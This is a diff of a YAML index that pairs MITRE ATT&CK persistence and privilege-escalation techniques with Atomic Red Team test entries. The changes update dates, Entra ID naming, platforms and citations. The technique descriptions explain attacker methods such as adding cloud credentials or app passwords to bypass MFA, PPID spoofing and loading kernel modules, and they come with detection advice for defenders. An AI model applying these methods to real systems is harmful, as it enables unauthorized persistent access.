         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -21869,13 +22172,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -21888,16 +22189,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -21909,16 +22210,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -21973,7 +22274,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -21996,7 +22296,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -22040,8 +22340,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -22118,7 +22416,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -22146,8 +22444,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Add macOS LoginItem using Applescript
@@ -22234,23 +22530,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -22260,11 +22555,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -22275,12 +22574,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -22289,6 +22595,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -22297,13 +22604,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -22329,10 +22639,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -22341,10 +22659,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -22361,9 +22689,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -22427,7 +22752,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -22516,7 +22840,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -22574,7 +22897,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -22599,12 +22922,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -22630,7 +22952,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -22644,7 +22965,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -22671,8 +22991,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -22683,7 +23003,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -22754,7 +23075,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -22781,7 +23102,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -22821,7 +23141,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -22841,7 +23161,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests:
     - name: Persistance with Event Monitor - emond
@@ -22868,7 +23187,7 @@ privilege-escalation:
         elevation_required: true
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -22922,11 +23241,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -23013,9 +23331,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -23028,12 +23346,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -23069,16 +23386,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -23119,143 +23435,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
